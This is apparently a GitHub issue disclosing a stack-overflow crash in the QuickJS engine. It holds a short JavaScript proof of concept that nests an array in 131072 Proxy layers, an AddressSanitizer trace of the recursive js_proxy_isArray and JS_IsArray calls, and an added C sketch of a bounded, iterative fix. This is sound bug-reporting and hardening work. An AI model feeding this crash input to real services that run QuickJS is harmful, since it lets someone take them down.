AddressSanitizer: stack-overflow #178

Open
Ye0nny opened this issue Apr 22, 2023 · 0 comments

Ye0nny commented Apr 22, 2023

QuickJS Version

Version : 2788d71

Platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build

  • Address Sanitizer=On
  • Debug (and Release)

PoC

testcase

Array.isArray([]); Array.isArray({}), Array.isArray(null), Array.isArray(0), Array.isArray(0.1), Array.isArray(""), Array.isArray(void 0), Array.isArray(new Proxy([], {})), Array.isArray(new Proxy({}, {})), Array.isArray(new Proxy(new Proxy([], {}), {})), Array.isArray(new Proxy(new Proxy({}, {}), {})); for (var r = new Proxy([], {}), y = 0; y < 131072; y++) r = new Proxy(r, {}); Array.isArray(r), RangeError;

// poc.js
// Wrap an empty array in 131072 nested Proxy layers, then ask Array.isArray() about the outermost one.
for (var r = new Proxy([], {}), y = 0; y < 131072; y++)
    r = new Proxy(r, {});
Array.isArray(r); // each Proxy layer adds another JS_IsArray() -> js_proxy_isArray() frame

Execution steps & Output

The js_proxy_isArray() function and the JS_IsArray() function call each other recursively.
An infinite loop occurs here.

$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.
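Added example (not QuickJS code and not the reporter's): a small standalone C model of the IsArray() walk over a Proxy chain, showing the mutually recursive shape from the trace beside a bounded, iterative form that reports an over-long chain as an error instead of exhausting the native stack. All names (Obj, is_array_recursive, is_array_bounded, MAX_PROXY_DEPTH, build_proxy_chain, check_nested_proxy_chain) and the depth limit of 1000 are hypothetical.

```c
/* Added example, not QuickJS code: a minimal model of the IsArray() abstract
 * operation over a chain of Proxy objects. All names here are hypothetical. */
#include <stddef.h>
#include <stdlib.h>
typedef enum { KIND_PLAIN, KIND_ARRAY, KIND_PROXY } Kind;
typedef struct Obj { Kind kind; struct Obj *target; /* Proxy target */ } Obj;
/* Return codes: 1 = array, 0 = not an array, -1 = chain too deep (RangeError). */
enum { ISARRAY_FALSE = 0, ISARRAY_TRUE = 1, ISARRAY_RANGE_ERROR = -1 };
/* Shape of the bug in the report: IsArray and the Proxy case call each other,
 * so every Proxy layer costs a native stack frame and a long chain overflows. */
static int proxy_is_array_recursive(const Obj *p);
static int is_array_recursive(const Obj *o) {
    if (o->kind == KIND_ARRAY) return ISARRAY_TRUE;
    if (o->kind == KIND_PROXY) return proxy_is_array_recursive(o);
    return ISARRAY_FALSE;
}
static int proxy_is_array_recursive(const Obj *p) { return is_array_recursive(p->target); }

/* Hardened form: unwrap the chain iteratively under an explicit bound and turn
 * an over-long chain into a catchable error instead of exhausting the C stack. */
#define MAX_PROXY_DEPTH 1000
static int is_array_bounded(const Obj *o) {
    size_t depth = 0;
    while (o->kind == KIND_PROXY) {
        if (++depth > MAX_PROXY_DEPTH)
            return ISARRAY_RANGE_ERROR;  /* an engine would throw RangeError here */
        o = o->target;
    }
    return o->kind == KIND_ARRAY ? ISARRAY_TRUE : ISARRAY_FALSE;
}

/* Constructed input matching poc.js: `layers` Proxy objects around one array,
 * stored in one heap block (chain[0] is the array, chain[layers] the outermost). */
static Obj *build_proxy_chain(size_t layers) {
    Obj *chain = malloc((layers + 1) * sizeof *chain);
    if (!chain) return NULL;
    chain[0].kind = KIND_ARRAY; chain[0].target = NULL;
    for (size_t i = 1; i <= layers; i++) {
        chain[i].kind = KIND_PROXY; chain[i].target = &chain[i - 1];
    }
    return chain;
}
/* Runs the bounded check on a chain of `layers` proxies (the PoC uses 131072). */
static int check_nested_proxy_chain(size_t layers) {
    Obj *chain = build_proxy_chain(layers);
    if (!chain) return ISARRAY_RANGE_ERROR;
    int r = is_array_bounded(&chain[layers]);
    free(chain);
    return r;
}
```

The recursive form is kept only to make the frame-per-layer cost visible on short chains; the bounded walk is the one that survives the 131072-layer input from the report.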
